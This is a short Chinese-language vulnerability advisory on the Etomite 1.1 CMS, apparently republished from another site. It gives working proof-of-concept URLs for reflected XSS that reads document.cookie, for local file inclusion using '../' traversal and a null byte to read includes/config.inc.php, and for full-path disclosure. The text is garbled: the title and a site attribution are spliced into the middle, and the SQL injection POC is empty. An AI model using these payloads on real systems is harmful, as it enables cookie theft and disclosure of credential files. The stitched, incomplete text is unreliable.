由于该漏洞存在于“/index.php”的脚本没有经过过滤就提供搜索变量的输入,
Etomite 1.1 SQL,XSS,文件包含漏洞及修复
。攻击者可以修改应用程序SQL查询到数据库,执行任意查询数据库,妥协的应用程序,访问或修改敏感数据,或利用底层的SQL数据库中的各种漏洞。SQL注入:
POC:
XSS跨站:
POC:
http://www.hackqing.com/manager/index.php?location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
本地文件包含:
由于该漏洞存在于“/manager/actions/static/ document_data.static.action.php”,远程用户可以查看任何本地文件,
电脑资料
《Etomite 1.1 SQL,XSS,文件包含漏洞及修复》(https://www.unjs.com)。http://www.hackqing.com/manager/actions/static/document_data.static.action.php?id=/../../../../includes/config.inc.php%00
敏感信息泄漏:爆物理路径
由于该漏洞存在于“/ manager/frames/3.php”脚本失败,有可能产生错误,从而揭开了脚本的完整路径。远程用户可以决定到Web根目录和其他潜在的敏感信息的完整路径。
POC:http://www.hackqing.com/manager/frames/3.php
form.:High-Tech Bridge ,由情整理编辑
修复方案:过滤